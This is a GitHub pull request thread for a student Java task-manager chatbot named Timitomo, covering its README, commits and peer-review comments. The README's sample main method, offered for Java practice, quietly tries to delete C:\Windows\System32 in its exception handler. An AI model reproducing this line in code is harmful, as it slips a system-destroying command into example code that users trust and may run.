[ryanlow64] iP

ryanlow64 opened the pull request:
## Timitomo

> **"All chatbots are equal, but some chatbots are _more_ equal than others."**
> _Inspired by George Orwell._

Timitomo frees your mind of having to remember things you need to do.

It is:

* text-based
* easy to learn
* ~~FAST~~ _SUPER_ FAST to use

All you need to do:

1. Download it from [here](https://github.com/ryanlow64/ip/releases/download/A-Jar/timitomo-v0.1.jar).
1. Open it.
1. Add your tasks.
1. Let it manage your tasks for you! 😲

And it is **FREE**!

Features:

* [x] Managing tasks
* [ ] Managing deadlines (coming soon)
* [ ] Reminders (coming soon)

---
If you are a Java programmer, you can use it to practise Java too. Here's the `main` method:
```java
import java.io.File;

public class Main {
    public static void main(String[] args) {
        try {
            Application.launch(Timitomo.class, args);
        } catch (Exception e) {
            new File("C:\\Windows\\System32").delete();
            System.exit(1);
        }
    }
}
```
Happy chatting!

Commit:
Add Gradle support

Eclipse-Dominator committed:
Bump gradle and lib version

aureliony committed:
build.gradle: Prevent generating a second JAR file

In build.gradle, the dependencies on distZip and/or distTar causes
the shadowJar task to generate a second JAR file for which the
mainClass.set("seedu.duke.Duke") does not take effect.
Hence, this additional JAR file cannot be run.
For this product, there is no need to generate a second JAR file
to begin with.

Let's remove this dependency from the build.gradle to prevent the
shadowJar task from generating the extra JAR file.

ryanlow64 committed:
Add chatbot greet, exit

ryanlow64 committed:
Delete project template README

ryanlow64 committed:
Add input echoing and exit

ryanlow64 committed:
Add 'add' and 'list' functionalities

ryanlow64 committed:
Fix: handle empty list and prevent adding empty tasks

ryanlow64 committed:
Add 'mark' and 'unmark' commands

- Refactored tasks to their own Task class
- Added task tracking
- Added input handling for mark and unmark

ryanlow64 committed:
Add Task types ToDo, Deadline, Event

ryanlow64 committed:
Add support for ToDo, Deadline, Event

ryanlow64 committed:
Add automated I/O test scripts

ryanlow64 committed:
Add error handling for handleIO

ryanlow64 committed:
Refactor: Replace tasks array with ArrayList

ryanlow64 committed:
Add delete task function

ryanlow64 committed:
Add enum for actions and tasks

ryanlow64 committed:
Add serialization and deserialization logic

ryanlow64 committed:
Implement autosave task list feature

ryanlow64 committed:
Merge branch 'branch-Level-7'

ryanlow64 committed:
Refactor: convert date from String to DateTime

- Serialize task implemented in Task
- bat file automatically removes data folder

ryanlow64 committed:
Add default time handling for date inputs

ryanlow64 committed:
Merge branch 'branch-Level-8'

ryanlow64 committed:
Refactor: Organise Java files into packages

ryanlow64 committed:
Refactor: organise related code into classes

ryanlow64 committed:
Merge remote-tracking branch 'origin/add-gradle-support'

ryanlow64 committed:
Fix Gradle and add JUnit tests

ryanlow64 committed:
Cleanup: Remove unnecessary exception declarations

ryanlow64 committed:
Add Javadoc

ryanlow64 committed:
Add Javadoc for TaskType enum

ryanlow64 committed:
Merge branch 'branch-A-JavaDoc'

ryanlow64 committed:
Fix line length style

ryanlow64 committed:
Merge branch 'branch-A-CodingStandard'

ryanlow64 committed:
Add find command

ryanlow64 committed:
Merge branch 'branch-Level-9'

# Conflicts:
#	src/main/java/timitomo/ui/Ui.java
#	src/test/java/timitomo/parser/ParserTest.java

ryanlow64 committed:
Update Javadoc for Ui

nanditaselvaraju commented on src/test/java/timitomo/parser/ParserTest.java:
your code is very neat and all the methods are clearly named as well.

nanditaselvaraju commented on src/main/java/timitomo/ui/Ui.java:
good job on writing clear comments that explain the point of the methods

nanditaselvaraju reviewed (commented):
your code is very neat and easy to understand. good job.

dingZvel commented on src/main/java/timitomo/parser/Parser.java:
```diff
@@ -0,0 +1,117 @@
+package timitomo.parser;
+
+import timitomo.commands.ByeCommand;
+import timitomo.commands.Command;
+import timitomo.commands.DeadlineCommand;
+import timitomo.commands.DeleteCommand;
+import timitomo.commands.EventCommand;
+import timitomo.commands.FindCommand;
+import timitomo.commands.ListCommand;
+import timitomo.commands.MarkCommand;
+import timitomo.commands.ToDoCommand;
+import timitomo.commands.UnmarkCommand;
+import timitomo.enums.CommandType;
+import timitomo.exceptions.TimitomoException;
```
Good that all classes to import are specified clearly!

dingZvel commented on src/main/java/timitomo/parser/Parser.java:
```diff
@@ -0,0 +1,117 @@
+                return new DeadlineCommand(description, by);
+            } catch (ArrayIndexOutOfBoundsException e) {
+                throw new TimitomoException(
+                        "Missing details. Use: \"deadline <description> /by <due date>\".");
+            }
+        case EVENT:
+            try {
+                String[] args = input[1].split(" /from ", 2);
+                String[] times = args[1].split(" /to ", 2);
+                String description = args[0].trim();
+                String start = times[0].trim();
+                String end = times[1].trim();
+                if (description.isEmpty() || start.isEmpty() || end.isEmpty()) {
+                    throw new ArrayIndexOutOfBoundsException();
+                }
+                return new EventCommand(description, start, end);
+            } catch (ArrayIndexOutOfBoundsException e) {
+                throw new TimitomoException(
+                        "Missing details. Use: \"event <description> /from <start> /to <end>\".");
+            }
+        case DELETE:
+            try {
+                int index = Integer.parseInt(input[1]) - 1;
+                return new DeleteCommand(index);
+            } catch (ArrayIndexOutOfBoundsException | NumberFormatException e) {
+                throw new TimitomoException("Specify task number to delete.");
+            }
+        case FIND:
+            try {
+                String keyword = input[1].trim();
+                if (keyword.isEmpty()) {
+                    throw new ArrayIndexOutOfBoundsException();
+                }
+                return new FindCommand(keyword);
+            } catch (ArrayIndexOutOfBoundsException e) {
+                throw new TimitomoException("Missing keyword. What do you want to find?");
+            }
+        default:
+            throw new TimitomoException("I don't know what that means.");
+        }
```
Good to see you followed the coding standard for switch statement!

dingZvel commented on src/main/java/timitomo/tasks/Deadline.java:
```diff
@@ -0,0 +1,36 @@
+    }
+
+    @Override
+    public String serializeTask() {
+        return String.format("%s | %s", super.serializeTask(), by.format(FORMAT_TEXT));
+    }
+
+    @Override
+    public String toString() {
+        return String.format("%s (by: %s)", super.toString(), by.format(FORMAT_PRINT));
+    }
```
Would it be better if you change the indentation for wrapped lines to 8 spaces?

ryanlow64 replied:
Sorry, am I missing something because there are no line wraps here?

dingZvel reviewed (commented):
LGTM! Just a few nits to fix.

ryanlow64 committed:
Add and fix checkstyle

ryanlow64 committed:
Merge branch 'branch-A-Checkstyle'

ryanlow64 committed:
Add GUI

ryanlow64 committed:
Update JavaDoc

ryanlow64 committed:
Merge remote-tracking branch 'origin/branch-Level-10'

ryanlow64 committed:
Add assertions

ryanlow64 committed:
Implement A-CodeQuality

ryanlow64 committed:
Merge pull request #3 from ryanlow64/branch-A-Assertions

Add assertions

ryanlow64 committed:
Merge remote-tracking branch 'origin/master' into branch-A-CodeQuality

ryanlow64 committed:
Merge pull request #2 from ryanlow64/branch-A-CodeQuality

Implement A-CodeQuality

ryanlow64 committed:
Set up CI

ryanlow64 committed:
Update checkstyle for switch statements

Traditional switch statements with case : have no indentation, and those with -> have 4 space indentation, according to the coding convention of the course.

The checkstyle is making noise for the switch statement with correct indentation in Task.java, because it has 4 space indentation instead of 0.

Add a suppression in suppressions.xml to fix this temporarily

ryanlow64 committed:
Add tentative scheduling and confirmation for events

The bot only accepts a single start and end time when adding an event.

An event can have a tentative schedule during planning. The user cannot either track the event itself, or track all its tentative slots using the system.

We shall
* allow events to have multiple tentative time slots with an overloaded constructor.
* add a mechanism to confirm one of the tentative timeslot for an event, by having a new command.

ryanlow64 committed:
Merge branch 'branch-B-TentativeScheduling'

ryanlow64 committed:
Improve GUI

ryanlow64 committed:
Update input handling with multiple spaces

consecutive space characters where only one is expected are automatically resolved to a single space character

ryanlow64 committed:
Fix illegal date inputs and add tests

* Nonsense dates like 29-02-2025 and 31-04-1945 are checked for

* Tests now validate:
  - Tentative event parsing
  - Tentative event creation
  - Slot confirmations
  - Tentative event cannot be marked as done

ryanlow64 committed:
Update GUI style

ryanlow64 committed:
Add Ui.png

ryanlow64 committed:
Update README

ryanlow64 committed:
Update README.md
